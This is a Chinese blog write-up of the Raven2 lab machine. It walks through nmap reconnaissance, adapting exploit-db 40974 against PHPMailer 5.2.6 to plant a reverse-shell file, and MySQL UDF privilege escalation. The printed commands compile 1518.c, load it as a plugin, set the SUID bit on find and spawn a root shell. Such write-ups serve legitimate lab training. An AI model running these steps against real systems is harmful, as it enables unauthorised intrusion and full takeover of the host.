【学渗透靶机——Raven2(mysql-udf提权)】

信息收集

主机信息收集

主机ip

map -sn  192.168.241.0/24 

在这里插入图片描述

主机开放端口

nmap --min-rate 10000 -p- 192.168.241.169

在这里插入图片描述

主机开放端口服务详细版本

nmap -sT -sV -O -p22,80,111,39169 192.168.241.169

在这里插入图片描述

nmap漏洞探测

nmap --script=vuln -p22,80,111,39169 192.168.241.169

在这里插入图片描述
nmap漏洞探测没有发现可利用的漏洞信息,只有网站的路径枚举信息,,我们留着,后面查看
有个blog使用wordpress框架

主机开放有22,80,111,39169端口 ,22端口没有收集到账号密码信息,那么暴力ssh 消耗时间成本太大,,优先80端口

web 信息收集

80端口

在这里插入图片描述
浏览完页面没有发现什么, 发现blog 是个wordpress CMS,有个搜索,尝试注入,使用sqlmap 跑了一下,没跑成功;
nmap 漏洞探测有路径枚举出的进行访问

wordpree登录页面 尝试弱口令失败

在这里插入图片描述
查看一下wordpress 的版本,已经限制,不能查看版本

http://192.168.241.169/wp-admin/install.php

/vendor/
在http://192.168.241.169/vendor/目录下;

在这里插入图片描述
查看path文件发现有个绝对路径,记录下:
在这里插入图片描述
VERSION,查看该文件可看到一个版本号:5.2.6,这可能是一个软件版本号

再看 /vendor 目录下,还有几个文件名含有 phpmailer 的文件,如 PHPMailerAutoload.php ,可确定 5.2.6 是 PHPMailer 的版本号。
于是使用 searchsploit 在 exploit-db 中搜索 PHPMailer 相关的 exp。这里我们使用40974

在这里插入图片描述
下载后修改:

a.顶部加上# -*- coding: utf-8 -*-声明,否则注释里一大堆非ASCII字符会报错。
b.修改target为靶机IP地址,利用文件为contact.php。
c.修改后门文件路径名称。也不知道为什么,用默认的backdoor.php总是利用不成功,把payload改成shell.php最终利用成功。
d. 修改反弹shell的地址为nc监听服务器的ip(KALI主机IP)和端口。
e、使用python3 运行脚本

在这里插入图片描述
kali设置监听端口,靶机访问shell 文件.

http://192.168.241.169/shell.php

获取系统初始立足点

获取良好shell交互性

python -c 'import pty;pty.spawn("/bin/bash");'

sudo -l

需要密码,这里我们没有,略过

查看计划任务

在这里插入图片描述
发现计划任务不可利用

查看密码文件的权限及账号信息

在这里插入图片描述
/etc/passwd 对于当前用户只有read 权限,那我们就查看一下账户信息

michael:x:1000:1000:michael,,,:/home/michael:/bin/bash
steven:x:1001:1001::/home/steven:/bin/sh

这两个账号家目录下没有发现什么有用信息

查找当前用户能够执行的s位文件

find / -perm -u=s -type f 2>/dev/null

s位文件中也没有发现可以利用的信息

查看服务

在这里插入图片描述
发现系统启用了22(ssh)111 (rpcbind),3306(mysql) 等服务。既然有数据库,还有之前有个wordpress 的blog ,那么查找一下数据库配置文件,

在这里插入图片描述
嘿嘿。。。 ssh端口也开放 我们先尝试 只用这个密码和之前的两个账号和root进行ssh爆破
在这里插入图片描述

失败告终,我们现在有数据库的root 的密码,那么我们尝试mysql udf 提权呢

提权

mysql udf 提权信息收集

(1)mysql 登录账号及密码:
root R@v3nSecurity
(2)查看secure_file_priv值是否为空

show variables like '%secure_file_priv%';

在这里插入图片描述

(3)查看数据库插件路径

show variables like '%plugin%';

在这里插入图片描述
(4)查看数据库版本
在这里插入图片描述

mysql udf 提权利用文件exp 准备

(1)使用searchsploit 查找 mysql udf exp
在这里插入图片描述
(2)这里我们使用1518.c 上传靶机上tmp 目录并编译生成共享库文件1518.so

gcc -g -c 1518.c -fPIC 
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc 

在这里插入图片描述

(3) 靶机登录数据库操作:

create table fo(line blob);
insert into fo values(load_file('/tmp/1518.so'));
select * from fo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');  

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

提权操作

cd /tmp
touch foo
find foo -exec "/bin/sh" \;

在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值